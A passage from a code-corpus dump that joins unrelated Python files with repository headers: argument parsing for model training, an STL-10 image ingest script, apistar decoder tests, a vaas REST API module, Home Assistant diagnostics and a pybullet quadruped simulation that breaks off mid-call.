arguments_ddp(parser=parser) # stats arguments parser = arguments_stats(parser=parser) # common parser = arguments_common(parser=parser) if parse_args: # parse args opts = parser.parse_args() opts = load_config_file(opts) return opts else: return parser def get_eval_arguments(parse_args=True): return get_training_arguments(parse_args=parse_args) def get_conversion_arguments(): parser = get_training_arguments(parse_args=False) # Arguments related to coreml conversion group = parser.add_argument_group("Conversion arguments") group.add_argument( "--conversion.coreml-extn", type=str, default="mlmodel", help="Extension for converted model. Default is mlmodel", ) group.add_argument( "--conversion.input-image-path", type=str, default=None, help="Path of the image to be used for conversion", ) # Arguments related to server. group.add_argument( "--conversion.bucket-name", type=str, help="Model job's bucket name" ) group.add_argument("--conversion.task-id", type=str, help="Model job's id") group.add_argument( "--conversion.viewers", type=str, nargs="+", default=None, help="Users who can view your models on server", ) # parse args opts = parser.parse_args() opts = load_config_file(opts) return opts def get_bencmarking_arguments(): parser = get_training_arguments(parse_args=False) # group = parser.add_argument_group("Benchmarking arguments") group.add_argument( "--benchmark.batch-size", type=int, default=1, help="Batch size for benchmarking", ) group.add_argument( "--benchmark.warmup-iter", type=int, default=10, help="Warm-up iterations" ) group.add_argument( "--benchmark.n-iter", type=int, default=100, help="Number of iterations for benchmarking", ) group.add_argument( "--benchmark.use-jit-model", action="store_true", help="Convert the model to JIT and then benchmark it", ) # parse args opts = parser.parse_args() opts = load_config_file(opts) return opts def get_segmentation_eval_arguments(): parser = get_training_arguments(parse_args=False) group = parser.add_argument_group("Segmentation evaluation related arguments") group.add_argument( "--evaluation.segmentation.apply-color-map", action="store_true", help="Apply color map to different classes in segmentation masks. Useful in visualization " "+ some competitions (e.g, PASCAL VOC) accept submissions with colored segmentation masks", ) group.add_argument( "--evaluation.segmentation.save-overlay-rgb-pred", action="store_true", help="enable this flag to visualize predicted masks on top of input image", ) group.add_argument( "--evaluation.segmentation.save-masks", action="store_true", help="save predicted masks without colormaps. Useful for submitting to " "competitions like Cityscapes", ) group.add_argument( "--evaluation.segmentation.overlay-mask-weight", default=0.5, type=float, help="Contribution of mask when overlaying on top of RGB image. ", ) group.add_argument( "--evaluation.segmentation.mode", type=str, default="validation_set", required=False, choices=["single_image", "image_folder", "validation_set"], help="Contribution of mask when overlaying on top of RGB image. ", ) group.add_argument( "--evaluation.segmentation.path", type=str, default=None, help="Path of the image or image folder (only required for single_image and image_folder modes)", ) group.add_argument( "--evaluation.segmentation.num-classes", type=str, default=None, help="Number of segmentation classes used during training", ) group.add_argument( "--evaluation.segmentation.resize-input-images", action="store_true", help="Resize input images", ) # parse args opts = parser.parse_args() opts = load_config_file(opts) return opts def get_detection_eval_arguments(): parser = get_training_arguments(parse_args=False) group = parser.add_argument_group("Detection evaluation related arguments") group.add_argument( "--evaluation.detection.save-overlay-boxes", action="store_true", help="enable this flag to visualize predicted masks on top of input image", ) group.add_argument( "--evaluation.detection.mode", type=str, default="validation_set", required=False, choices=["single_image", "image_folder", "validation_set"], help="Contribution of mask when overlaying on top of RGB image. ", ) group.add_argument( "--evaluation.detection.path", type=str, default=None, help="Path of the image or image folder (only required for single_image and image_folder modes)", ) group.add_argument( "--evaluation.detection.num-classes", type=str, default=None, help="Number of segmentation classes used during training", ) group.add_argument( "--evaluation.detection.resize-input-images", action="store_true", default=False, help="Resize the input images", ) # parse args opts = parser.parse_args() opts = load_config_file(opts) return opts def get_loss_landscape_args(): parser = get_training_arguments(parse_args=False) group = parser.add_argument_group("Loss landscape related arguments") group.add_argument( "--loss-landscape.n-points", type=int, default=11, help="No. of grid points. Default is 11, so we have 11x11 grid", ) group.add_argument( "--loss-landscape.min-x", type=float, default=-1.0, help="Min. value along x-axis", ) group.add_argument( "--loss-landscape.max-x", type=float, default=1.0, help="Max. value along x-axis", ) group.add_argument( "--loss-landscape.min-y", type=float, default=-1.0, help="Min. value along y-axis", ) group.add_argument( "--loss-landscape.max-y", type=float, default=1.0, help="Max. value along y-axis", ) # parse args opts = parser.parse_args() opts = load_config_file(opts) return opts
ArtGAN/data/ingest_stl10.py
rh01/caffe-model-for-category-artgan
304
29815
from configargparse import ArgParser from PIL import Image import logging import numpy as np import os def transform_and_save(img_arr, output_filename): """ Takes an image and optionally transforms it and then writes it out to output_filename """ img = Image.fromarray(img_arr) img.save(output_filename) class Ingest(object): def __init__(self, input_dir, out_dir, target_size=96, skipimg=False): np.random.seed(0) self.skipimg = skipimg self.out_dir = out_dir self.input_dir = input_dir self.manifests = dict() for setn in ('train', 'val'): self.manifests[setn] = os.path.join(self.out_dir, '{}-index.csv'.format(setn)) self.target_size = target_size self.trainpairlist = {} self.valpairlist = {} self.labels = range(10) if not os.path.exists(self.out_dir): os.mkdir(self.out_dir) self.outimgdir = os.path.join(self.out_dir, 'images') if not os.path.exists(self.outimgdir): os.mkdir(self.outimgdir) os.mkdir(os.path.join(self.outimgdir, 'train')) os.mkdir(os.path.join(self.outimgdir, 'val')) self.outlabeldir = os.path.join(self.out_dir, 'labels') if not os.path.exists(self.outlabeldir): os.mkdir(self.outlabeldir) def collectdata(self,): print 'Start Collect Data...' train_x_path = os.path.join(self.input_dir, 'train_X.bin') train_y_path = os.path.join(self.input_dir, 'train_y.bin') test_x_path = os.path.join(self.input_dir, 'test_X.bin') test_y_path = os.path.join(self.input_dir, 'test_y.bin') train_xf = open(train_x_path, 'rb') train_x = np.fromfile(train_xf, dtype=np.uint8) train_x = np.reshape(train_x, (-1, 3, 96, 96)) train_x = np.transpose(train_x, (0, 3, 2, 1)) train_yf = open(train_y_path, 'rb') train_y = np.fromfile(train_yf, dtype=np.uint8) test_xf = open(test_x_path, 'rb') test_x = np.fromfile(test_xf, dtype=np.uint8) test_x = np.reshape(test_x, (-1, 3, 96, 96)) test_x = np.transpose(test_x, (0, 3, 2, 1)) test_yf = open(test_y_path, 'rb') test_y = np.fromfile(test_yf, dtype=np.uint8) idx = np.zeros(10, dtype=np.int) for i in xrange(train_x.shape[0]): outdir = os.path.join(self.outimgdir, 'train', str(train_y[i]-1)) if not os.path.exists(outdir): os.mkdir(outdir) if not self.skipimg: transform_and_save(img_arr=train_x[i], output_filename=os.path.join(outdir, str(idx[train_y[i]-1]) + '.jpg')) self.trainpairlist[os.path.join('images', 'train', str(train_y[i]-1), str(idx[train_y[i]-1]) + '.jpg')] = \ os.path.join('labels', str(train_y[i] - 1) + '.txt') idx[train_y[i]-1] += 1 idx = np.zeros(10, dtype=np.int) for i in xrange(test_x.shape[0]): outdir = os.path.join(self.outimgdir, 'val', str(test_y[i]-1)) if not os.path.exists(outdir): os.mkdir(outdir) if not self.skipimg: transform_and_save(img_arr=test_x[i], output_filename=os.path.join(outdir, str(idx[test_y[i]-1]) + '.jpg')) self.valpairlist[os.path.join('images', 'val', str(test_y[i]-1), str(idx[test_y[i]-1]) + '.jpg')] = \ os.path.join('labels', str(test_y[i] - 1) + '.txt') idx[test_y[i]-1] += 1 print 'Finished Collect Data...' def write_label(self, ): for i, l in enumerate(self.labels): sdir = os.path.join(self.outlabeldir, str(i) + '.txt') np.savetxt(sdir, [l], '%d') def run(self): """ resize images then write manifest files to disk. """ self.write_label() self.collectdata() records = [(fname, tgt) for fname, tgt in self.trainpairlist.items()] np.savetxt(self.manifests['train'], records, fmt='%s,%s') records = [(fname, tgt) for fname, tgt in self.valpairlist.items()] np.savetxt(self.manifests['val'], records, fmt='%s,%s') class IngestUnlabeled(object): def __init__(self, input_dir, out_dir, target_size=96, skipimg=False): np.random.seed(0) self.skipimg = skipimg self.out_dir = out_dir self.input_dir = input_dir self.manifests = dict() self.manifests = os.path.join(self.out_dir, 'unlabeled-index.csv') self.target_size = target_size self.trainpairlist = {} if not os.path.exists(self.out_dir): os.mkdir(self.out_dir) self.outimgdir = os.path.join(self.out_dir, 'images') if not os.path.exists(self.outimgdir): os.mkdir(self.outimgdir) self.unlabeldir = os.path.join(self.outimgdir, 'unlabeled') if not os.path.exists(self.unlabeldir): os.mkdir(self.unlabeldir) def collectdata(self,): print 'Start Collect Data...' train_x_path = os.path.join(self.input_dir, 'unlabeled_X.bin') train_xf = open(train_x_path, 'rb') train_x = np.fromfile(train_xf, dtype=np.uint8) train_x = np.reshape(train_x, (-1, 3, 96, 96)) train_x = np.transpose(train_x, (0, 3, 2, 1)) idx = 0 for i in xrange(train_x.shape[0]): if not self.skipimg: transform_and_save(img_arr=train_x[i], output_filename=os.path.join(self.unlabeldir, str(idx) + '.jpg')) self.trainpairlist[os.path.join('images', 'unlabeled', str(idx) + '.jpg')] = 'labels/11.txt' idx += 1 print 'Finished Collect Data...' def write_label(self, ): sdir = os.path.join(self.out_dir, 'labels', '11.txt') np.savetxt(sdir, [11], '%d') def run(self): """ resize images then write manifest files to disk. """ self.write_label() self.collectdata() records = [(fname, tgt) for fname, tgt in self.trainpairlist.items()] np.savetxt(self.manifests, records, fmt='%s,%s') if __name__ == "__main__": parser = ArgParser() parser.add_argument('--input_dir', help='Directory to find input', default='/hdd/Dataset/STL10') parser.add_argument('--out_dir', help='Directory to write ingested files', default='/home/william/PyProjects/TFcodes/dataset/stl10') parser.add_argument('--target_size', type=int, default=96, help='Size in pixels to scale shortest side DOWN to (0 means no scaling)') parser.add_argument('--skipImg', type=bool, default=False, help='True to skip processing and copying images') args = parser.parse_args() logger = logging.getLogger(__name__) bw = Ingest(input_dir=args.input_dir, out_dir=args.out_dir, target_size=args.target_size, skipimg=args.skipImg) # bw = IngestUnlabeled(input_dir=args.input_dir, out_dir=args.out_dir, target_size=args.target_size, skipimg=args.skipImg) bw.run()
tests/client/test_decoders.py
timgates42/apistar
4,284
29825
import os from starlette.applications import Starlette from starlette.responses import PlainTextResponse, Response from starlette.testclient import TestClient from apistar.client import Client, decoders app = Starlette() @app.route("/text-response/") def text_response(request): return PlainTextResponse("hello, world") @app.route("/file-response/") def file_response(request): headers = { "Content-Type": "image/png", "Content-Disposition": 'attachment; filename="filename.png"', } return Response(b"<somedata>", headers=headers) @app.route("/file-response-url-filename/name.png") def file_response_url_filename(request): headers = {"Content-Type": "image/png", "Content-Disposition": "attachment"} return Response(b"<somedata>", headers=headers) @app.route("/file-response-no-extension/name") def file_response_no_extension(request): headers = {"Content-Type": "image/png", "Content-Disposition": "attachment"} return Response(b"<somedata>", headers=headers) @app.route("/") def file_response_no_name(request): headers = {"Content-Type": "image/png", "Content-Disposition": "attachment"} return Response(b"<somedata>", headers=headers) schema = { "openapi": "3.0.0", "info": {"title": "Test API", "version": "1.0"}, "servers": [{"url": "http://testserver"}], "paths": { "/text-response/": {"get": {"operationId": "text-response"}}, "/file-response/": {"get": {"operationId": "file-response"}}, "/file-response-url-filename/name.png": { "get": {"operationId": "file-response-url-filename"} }, "/file-response-no-extension/name": { "get": {"operationId": "file-response-no-extension"} }, "/": {"get": {"operationId": "file-response-no-name"}}, }, } def test_text_response(): client = Client(schema, session=TestClient(app)) data = client.request("text-response") assert data == "hello, world" def test_file_response(): client = Client(schema, session=TestClient(app)) data = client.request("file-response") assert os.path.basename(data.name) == "filename.png" assert data.read() == b"<somedata>" def test_file_response_url_filename(): client = Client(schema, session=TestClient(app)) data = client.request("file-response-url-filename") assert os.path.basename(data.name) == "name.png" assert data.read() == b"<somedata>" def test_file_response_no_extension(): client = Client(schema, session=TestClient(app)) data = client.request("file-response-no-extension") assert os.path.basename(data.name) == "name.png" assert data.read() == b"<somedata>" def test_file_response_no_name(): client = Client(schema, session=TestClient(app)) data = client.request("file-response-no-name") assert os.path.basename(data.name) == "download.png" assert data.read() == b"<somedata>" def test_unique_filename(tmpdir): client = Client( schema, session=TestClient(app), decoders=[decoders.DownloadDecoder(tmpdir)] ) data = client.request("file-response") assert os.path.basename(data.name) == "filename.png" assert data.read() == b"<somedata>" data = client.request("file-response") assert os.path.basename(data.name) == "filename (1).png" assert data.read() == b"<somedata>"
vaas-app/src/vaas/manager/api.py
allegro/vaas
251
29849
<filename>vaas-app/src/vaas/manager/api.py # -*- coding: utf-8 -*- import logging from celery.result import AsyncResult from tastypie.resources import ModelResource, ALL_WITH_RELATIONS, Resource from tastypie import fields from tastypie.fields import ListField from tastypie.authentication import ApiKeyAuthentication, MultiAuthentication, SessionAuthentication from vaas.external.api import ExtendedDjangoAuthorization as DjangoAuthorization from vaas.external.tasty_validation import ModelCleanedDataFormValidation from vaas.external.serializer import PrettyJSONSerializer from vaas.cluster.api import DcResource from vaas.manager.forms import ProbeModelForm, DirectorModelForm, BackendModelForm, TimeProfileModelForm from vaas.manager.models import Backend, Probe, Director, TimeProfile, ReloadTask from vaas.monitor.models import BackendStatus from vaas.external.oauth import VaasMultiAuthentication logger = logging.getLogger('vaas') class TimeProfileResource(ModelResource): class Meta: queryset = TimeProfile.objects.all() resource_name = 'time_profile' serializer = PrettyJSONSerializer() authorization = DjangoAuthorization() authentication = VaasMultiAuthentication(ApiKeyAuthentication()) validation = ModelCleanedDataFormValidation(form_class=TimeProfileModelForm) always_return_data = True filtering = { 'max_connections': ['exact'], 'connect_timeout': ['exact'], 'first_byte_timeout': ['exact'], 'between_bytes_timeout': ['exact'] } class ProbeResource(ModelResource): class Meta: queryset = Probe.objects.all() resource_name = 'probe' serializer = PrettyJSONSerializer() authorization = DjangoAuthorization() authentication = VaasMultiAuthentication(ApiKeyAuthentication()) validation = ModelCleanedDataFormValidation(form_class=ProbeModelForm) always_return_data = True filtering = { 'name': ['exact'], 'url': ['exact'], 'expected_response': ['exact'] } class DirectorResource(ModelResource): probe = fields.ForeignKey(ProbeResource, 'probe', full=True) time_profile = fields.ForeignKey(TimeProfileResource, 'time_profile', full=True) backends = fields.ToManyField( 'vaas.manager.api.BackendResource', 'backends', null=True ) cluster = fields.ToManyField( 'vaas.cluster.api.LogicalClusterResource', 'cluster', null=True, full=True ) class Meta: queryset = Director.objects.all() resource_name = 'director' serializer = PrettyJSONSerializer() authorization = DjangoAuthorization() authentication = VaasMultiAuthentication(ApiKeyAuthentication(), SessionAuthentication()) validation = ModelCleanedDataFormValidation(form_class=DirectorModelForm) always_return_data = True filtering = { 'name': ['exact'], 'enabled': ['exact'], 'probe': ALL_WITH_RELATIONS, 'cluster': ALL_WITH_RELATIONS, 'service': ['exact'], 'virtual': ['exact'], 'service_tag': ['exact'], 'reachable_via_service_mesh': ['exact'], } def save_m2m(self, bundle): try: new_uris = bundle.obj.new_clusters_uris bundle.obj.new_clusters = [cluster.obj for cluster in bundle.data['cluster'] if cluster.data['resource_uri'] in new_uris] logger.info("[DirectorResource.save_m2m()] new_clusters = %s", bundle.obj.new_clusters) except (AttributeError, KeyError): pass return super(DirectorResource, self).save_m2m(bundle) def update_in_place(self, request, original_bundle, new_data): try: original_bundle.obj.old_clusters = list(original_bundle.obj.cluster.all()) except AttributeError: original_bundle.obj.old_clusters = [] logger.info("[DirectorResource.update_in_place()] old_clusters = %s", original_bundle.obj.old_clusters) try: original_bundle.obj.new_clusters_uris = new_data['cluster'] except KeyError: original_bundle.obj.new_clusters_uris = [] original_bundle.obj.new_data = new_data return super(DirectorResource, self).update_in_place(request, original_bundle, new_data) class BackendResource(ModelResource): dc = fields.ForeignKey(DcResource, 'dc', full=True) director = fields.ForeignKey(DirectorResource, 'director') tags = ListField() class Meta: queryset = Backend.objects.all() resource_name = 'backend' serializer = PrettyJSONSerializer() authorization = DjangoAuthorization() authentication = VaasMultiAuthentication(ApiKeyAuthentication()) validation = ModelCleanedDataFormValidation(form_class=BackendModelForm) always_return_data = True filtering = { 'dc': ALL_WITH_RELATIONS, 'director': ALL_WITH_RELATIONS, 'address': ['exact'], 'port': ['exact'] } def dehydrate(self, bundle): status = BackendStatus.objects.filter(address=bundle.data['address'], port=bundle.data['port']) if len(status) > 0: bundle.data['status'] = status[0].status else: bundle.data['status'] = "Unknown" bundle.data['time_profile'] = { 'max_connections': bundle.obj.director.time_profile.max_connections, 'connect_timeout': bundle.obj.director.time_profile.connect_timeout, 'first_byte_timeout': bundle.obj.director.time_profile.first_byte_timeout, 'between_bytes_timeout': bundle.obj.director.time_profile.between_bytes_timeout } return bundle def build_filters(self, filters=None, ignore_bad_filters=False): if filters is None: filters = {} orm_filters = super(BackendResource, self).build_filters(filters, ignore_bad_filters=ignore_bad_filters) if 'tag' in filters: orm_filters['tags__name__in'] = filters['tag'].split(',') return orm_filters def dehydrate_tags(self, bundle): return list(map(str, bundle.obj.tags.all())) def hydrate_tags(self, bundle): if isinstance(bundle.data.get('tags'), list): bundle.data['tags'] = ','.join(bundle.data['tags']) elif bundle.data.get('tags') is None: bundle.data['tags'] = '' return bundle def save_m2m(self, bundle): tags = bundle.data.get('tags', []) bundle.obj.tags.set(*tags) return super(BackendResource, self).save_m2m(bundle) class ReloadTaskResource(Resource): status = fields.CharField(attribute='status') info = fields.CharField(attribute='info') class Meta: resource_name = 'task' list_allowed_methods = ['get'] authorization = DjangoAuthorization() authentication = VaasMultiAuthentication(ApiKeyAuthentication()) fields = ['status', 'info'] include_resource_uri = True def obj_get(self, bundle, **kwargs): task = AsyncResult(kwargs['pk']) return ReloadTask(kwargs['pk'], task.status, '{}'.format(task.info)) def get_object_list(self, request): return None
homeassistant/components/launch_library/diagnostics.py
MrDelik/core
30,023
29874
"""Diagnostics support for Launch Library.""" from __future__ import annotations from typing import Any from pylaunches.objects.event import Event from pylaunches.objects.launch import Launch from homeassistant.config_entries import ConfigEntry from homeassistant.core import HomeAssistant from homeassistant.helpers.update_coordinator import DataUpdateCoordinator from . import LaunchLibraryData from .const import DOMAIN async def async_get_config_entry_diagnostics( hass: HomeAssistant, entry: ConfigEntry, ) -> dict[str, Any]: """Return diagnostics for a config entry.""" coordinator: DataUpdateCoordinator[LaunchLibraryData] = hass.data[DOMAIN] if coordinator.data is None: return {} def _first_element(data: list[Launch | Event]) -> dict[str, Any] | None: if not data: return None return data[0].raw_data_contents return { "next_launch": _first_element(coordinator.data["upcoming_launches"]), "starship_launch": _first_element( coordinator.data["starship_events"].upcoming.launches ), "starship_event": _first_element( coordinator.data["starship_events"].upcoming.events ), }
examples/pybullet/examples/quadruped.py
felipeek/bullet3
9,136
29881
<filename>examples/pybullet/examples/quadruped.py import pybullet as p import time import math import pybullet_data def drawInertiaBox(parentUid, parentLinkIndex, color): dyn = p.getDynamicsInfo(parentUid, parentLinkIndex) mass = dyn[0] frictionCoeff = dyn[1] inertia = dyn[2] if (mass > 0): Ixx = inertia[0] Iyy = inertia[1] Izz = inertia[2] boxScaleX = 0.5 * math.sqrt(6 * (Izz + Iyy - Ixx) / mass) boxScaleY = 0.5 * math.sqrt(6 * (Izz + Ixx - Iyy) / mass) boxScaleZ = 0.5 * math.sqrt(6 * (Ixx + Iyy - Izz) / mass) halfExtents = [boxScaleX, boxScaleY, boxScaleZ] pts = [[halfExtents[0], halfExtents[1], halfExtents[2]], [-halfExtents[0], halfExtents[1], halfExtents[2]], [halfExtents[0], -halfExtents[1], halfExtents[2]], [-halfExtents[0], -halfExtents[1], halfExtents[2]], [halfExtents[0], halfExtents[1], -halfExtents[2]], [-halfExtents[0], halfExtents[1], -halfExtents[2]], [halfExtents[0], -halfExtents[1], -halfExtents[2]], [-halfExtents[0], -halfExtents[1], -halfExtents[2]]] p.addUserDebugLine(pts[0], pts[1], color, 1, parentObjectUniqueId=parentUid, parentLinkIndex=parentLinkIndex) p.addUserDebugLine(pts[1], pts[3], color, 1, parentObjectUniqueId=parentUid, parentLinkIndex=parentLinkIndex) p.addUserDebugLine(pts[3], pts[2], color, 1, parentObjectUniqueId=parentUid, parentLinkIndex=parentLinkIndex) p.addUserDebugLine(pts[2], pts[0], color, 1, parentObjectUniqueId=parentUid, parentLinkIndex=parentLinkIndex) p.addUserDebugLine(pts[0], pts[4], color, 1, parentObjectUniqueId=parentUid, parentLinkIndex=parentLinkIndex) p.addUserDebugLine(pts[1], pts[5], color, 1, parentObjectUniqueId=parentUid, parentLinkIndex=parentLinkIndex) p.addUserDebugLine(pts[2], pts[6], color, 1, parentObjectUniqueId=parentUid, parentLinkIndex=parentLinkIndex) p.addUserDebugLine(pts[3], pts[7], color, 1, parentObjectUniqueId=parentUid, parentLinkIndex=parentLinkIndex) p.addUserDebugLine(pts[4 + 0], pts[4 + 1], color, 1, parentObjectUniqueId=parentUid, parentLinkIndex=parentLinkIndex) p.addUserDebugLine(pts[4 + 1], pts[4 + 3], color, 1, parentObjectUniqueId=parentUid, parentLinkIndex=parentLinkIndex) p.addUserDebugLine(pts[4 + 3], pts[4 + 2], color, 1, parentObjectUniqueId=parentUid, parentLinkIndex=parentLinkIndex) p.addUserDebugLine(pts[4 + 2], pts[4 + 0], color, 1, parentObjectUniqueId=parentUid, parentLinkIndex=parentLinkIndex) toeConstraint = True useMaximalCoordinates = False useRealTime = 0 #the fixedTimeStep and numSolverIterations are the most important parameters to trade-off quality versus performance fixedTimeStep = 1. / 100 numSolverIterations = 50 if (useMaximalCoordinates): fixedTimeStep = 1. / 500 numSolverIterations = 200 speed = 10 amplitude = 0.8 jump_amp = 0.5 maxForce = 3.5 kneeFrictionForce = 0 kp = 1 kd = .5 maxKneeForce = 1000 physId = p.connect(p.SHARED_MEMORY_GUI) if (physId < 0): p.connect(p.GUI) #p.resetSimulation() p.setAdditionalSearchPath(pybullet_data.getDataPath()) angle = 0 # pick in range 0..0.2 radians orn = p.getQuaternionFromEuler([0, angle, 0]) p.loadURDF("plane.urdf", [0, 0, 0], orn) p.setPhysicsEngineParameter(numSolverIterations=numSolverIterations) p.startStateLogging(p.STATE_LOGGING_GENERIC_ROBOT, "genericlogdata.bin", maxLogDof=16, logFlags=p.STATE_LOG_JOINT_TORQUES) p.setTimeOut(4000000) p.setGravity(0, 0, 0) p.setTimeStep(fixedTimeStep) orn = p.getQuaternionFromEuler([0, 0, 0.4]) p.setRealTimeSimulation(0) quadruped = p.loadURDF("quadruped/minitaur_v1.urdf", [1, -1, .3], orn, useFixedBase=False, useMaximalCoordinates=useMaximalCoordinates, flags=p.URDF_USE_IMPLICIT_CYLINDER) nJoints = p.getNumJoints(quadruped) jointNameToId = {} for i in range(nJoints): jointInfo = p.getJointInfo(quadruped, i) jointNameToId[jointInfo[1].decode('UTF-8')] = jointInfo[0] motor_front_rightR_joint = jointNameToId['motor_front_rightR_joint'] motor_front_rightL_joint = jointNameToId['motor_front_rightL_joint'] knee_front_rightL_link = jointNameToId['knee_front_rightL_link'] hip_front_rightR_link = jointNameToId['hip_front_rightR_link'] knee_front_rightR_link = jointNameToId['knee_front_rightR_link'] motor_front_rightL_link = jointNameToId['motor_front_rightL_link'] motor_front_leftR_joint = jointNameToId['motor_front_leftR_joint'] hip_front_leftR_link = jointNameToId['hip_front_leftR_link'] knee_front_leftR_link = jointNameToId['knee_front_leftR_link'] motor_front_leftL_joint = jointNameToId['motor_front_leftL_joint'] motor_front_leftL_link = jointNameToId['motor_front_leftL_link'] knee_front_leftL_link = jointNameToId['knee_front_leftL_link'] motor_back_rightR_joint = jointNameToId['motor_back_rightR_joint'] hip_rightR_link = jointNameToId['hip_rightR_link'] knee_back_rightR_link = jointNameToId['knee_back_rightR_link'] motor_back_rightL_joint = jointNameToId['motor_back_rightL_joint'] motor_back_rightL_link = jointNameToId['motor_back_rightL_link'] knee_back_rightL_link = jointNameToId['knee_back_rightL_link'] motor_back_leftR_joint = jointNameToId['motor_back_leftR_joint'] hip_leftR_link = jointNameToId['hip_leftR_link'] knee_back_leftR_link = jointNameToId['knee_back_leftR_link'] motor_back_leftL_joint = jointNameToId['motor_back_leftL_joint'] motor_back_leftL_link = jointNameToId['motor_back_leftL_link'] knee_back_leftL_link = jointNameToId['knee_back_leftL_link'] #fixtorso = p.createConstraint(-1,-1,quadruped,-1,p.JOINT_FIXED,[0,0,0],[0,0,0],[0,0,0]) motordir = [-1, -1, -1, -1, 1, 1, 1, 1] halfpi = 1.57079632679 twopi = 4 * halfpi kneeangle = -2.1834 dyn = p.getDynamicsInfo(quadruped, -1) mass = dyn[0] friction = dyn[1] localInertiaDiagonal = dyn[2] print("localInertiaDiagonal", localInertiaDiagonal) #this is a no-op, just to show the API p.changeDynamics(quadruped, -1, localInertiaDiagonal=localInertiaDiagonal) #for i in range (nJoints): # p.changeDynamics(quadruped,i,localInertiaDiagonal=[0.000001,0.000001,0.000001]) drawInertiaBox(quadruped, -1, [1, 0, 0]) #drawInertiaBox(quadruped,motor_front_rightR_joint, [1,0,0]) for i in range(nJoints): drawInertiaBox(quadruped, i, [0, 1, 0]) if (useMaximalCoordinates): steps = 400 for aa in range(steps): p.setJointMotorControl2(quadruped, motor_front_leftL_joint, p.POSITION_CONTROL, motordir[0] * halfpi * float(aa) / steps) p.setJointMotorControl2(quadruped, motor_front_leftR_joint, p.POSITION_CONTROL, motordir[1] * halfpi * float(aa) / steps) p.setJointMotorControl2(quadruped, motor_back_leftL_joint, p.POSITION_CONTROL, motordir[2] * halfpi * float(aa) / steps) p.setJointMotorControl2(quadruped, motor_back_leftR_joint, p.POSITION_CONTROL, motordir[3] * halfpi * float(aa) / steps) p.setJointMotorControl2(quadruped, motor_front_rightL_joint, p.POSITION_CONTROL, motordir[4] * halfpi * float(aa) / steps) p.setJointMotorControl2(quadruped, motor_front_rightR_joint, p.POSITION_CONTROL, motordir[5] * halfpi * float(aa) / steps) p.setJointMotorControl2(quadruped, motor_back_rightL_joint, p.POSITION_CONTROL, motordir[6] * halfpi * float(aa) / steps) p.setJointMotorControl2(quadruped, motor_back_rightR_joint, p.POSITION_CONTROL, motordir[7] * halfpi * float(aa) / steps) p.setJointMotorControl2(quadruped, knee_front_leftL_link, p.POSITION_CONTROL, motordir[0] * (kneeangle + twopi) * float(aa) / steps) p.setJointMotorControl2(quadruped, knee_front_leftR_link, p.POSITION_CONTROL, motordir[1] * kneeangle * float(aa) / steps) p.setJointMotorControl2(quadruped, knee_back_leftL_link, p.POSITION_CONTROL, motordir[2] * kneeangle * float(aa) / steps) p.setJointMotorControl2(quadruped, knee_back_leftR_link, p.POSITION_CONTROL, motordir[3] * (kneeangle + twopi) * float(aa) / steps) p.setJointMotorControl2(quadruped, knee_front_rightL_link, p.POSITION_CONTROL, motordir[4] * (kneeangle) * float(aa) / steps) p.setJointMotorControl2(quadruped, knee_front_rightR_link, p.POSITION_CONTROL, motordir[5] * (kneeangle + twopi) * float(aa) / steps) p.setJointMotorControl2(quadruped, knee_back_rightL_link, p.POSITION_CONTROL, motordir[6] * (kneeangle + twopi) * float(aa) / steps) p.setJointMotorControl2(quadruped, knee_back_rightR_link, p.POSITION_CONTROL, motordir[7] * kneeangle * float(aa) / steps) p.stepSimulation() #time.sleep(fixedTimeStep) else: p.resetJointState(quadruped, motor_front_leftL_joint, motordir[0] * halfpi) p.resetJointState(quadruped, knee_front_leftL_link, motordir[0] * kneeangle) p.resetJointState(quadruped, motor_front_leftR_joint, motordir[1] * halfpi) p.resetJointState(quadruped, knee_front_leftR_link, motordir[1] * kneeangle) p.resetJointState(quadruped, motor_back_leftL_joint, motordir[2] * halfpi) p.resetJointState(quadruped, knee_back_leftL_link, motordir[2] * kneeangle) p.resetJointState(quadruped, motor_back_leftR_joint, motordir[3] * halfpi) p.resetJointState(quadruped, knee_back_leftR_link, motordir[3] * kneeangle) p.resetJointState(quadruped, motor_front_rightL_joint, motordir[4] * halfpi) p.resetJointState(quadruped, knee_front_rightL_link, motordir[4] * kneeangle) p.resetJointState(quadruped, motor_front_rightR_joint, motordir[5] * halfpi) p.resetJointState(quadruped, knee_front_rightR_link, motordir[5] * kneeangle) p.resetJointState(quadruped, motor_back_rightL_joint, motordir[6] * halfpi) p.resetJointState(quadruped, knee_back_rightL_link, motordir[6] * kneeangle) p.resetJointState(quadruped, motor_back_rightR_joint, motordir[7] * halfpi) p.resetJointState(quadruped, knee_back_rightR_link, motordir[7] * kneeangle) #p.getNumJoints(1) if (toeConstraint): cid = p.createConstraint(quadruped, knee_front_leftR_link, quadruped, knee_front_leftL_link, p.JOINT_POINT2POINT, [0, 0, 0], [0, 0.005, 0.1], [0, 0.01, 0.1]) p.changeConstraint(cid, maxForce=maxKneeForce) cid = p.createConstraint(quadruped, knee_front_rightR_link, quadruped, knee_front_rightL_link, p.JOINT_POINT2POINT, [0, 0, 0], [0, 0.005, 0.1], [0, 0.01, 0.1]) p.changeConstraint(cid, maxForce=maxKneeForce) cid = p.createConstraint(quadruped, knee_back_leftR_link, quadruped, knee_back_leftL_link, p.JOINT_POINT2POINT, [0, 0, 0], [0, 0.005, 0.1], [0, 0.01, 0.1]) p.changeConstraint(cid, maxForce=maxKneeForce) cid = p.createConstraint(quadruped, knee_back_rightR_link, quadruped, knee_back_rightL_link, p.JOINT_POINT2POINT, [0, 0, 0], [0, 0.005, 0.1], [0, 0.01, 0.1]) p.changeConstraint(cid, maxForce=maxKneeForce) if (1): p.setJointMotorControl(quadruped, knee_front_leftL_link, p.VELOCITY_CONTROL, 0, kneeFrictionForce) p.setJointMotorControl(quadruped, knee_front_leftR_link, p.VELOCITY_CONTROL, 0, kneeFrictionForce) p.setJointMotorControl(quadruped, knee_front_rightL_link, p.VELOCITY_CONTROL, 0, kneeFrictionForce) p.setJointMotorControl(quadruped, knee_front_rightR_link, p.VELOCITY_CONTROL, 0, kneeFrictionForce) p.setJointMotorControl(quadruped, knee_back_leftL_link, p.VELOCITY_CONTROL, 0, kneeFrictionForce) p.setJointMotorControl(quadruped, knee_back_leftR_link, p.VELOCITY_CONTROL, 0, kneeFrictionForce) p.setJointMotorControl(quadruped, knee_back_leftL_link, p.VELOCITY_CONTROL, 0, kneeFrictionForce) p.setJointMotorControl(quadruped, knee_back_leftR_link, p.VELOCITY_CONTROL, 0, kneeFrictionForce) p.setJointMotorControl(quadruped, knee_back_rightL_link, p.VELOCITY_CONTROL, 0, kneeFrictionForce) p.setJointMotorControl(quadruped, knee_back_rightR_link, 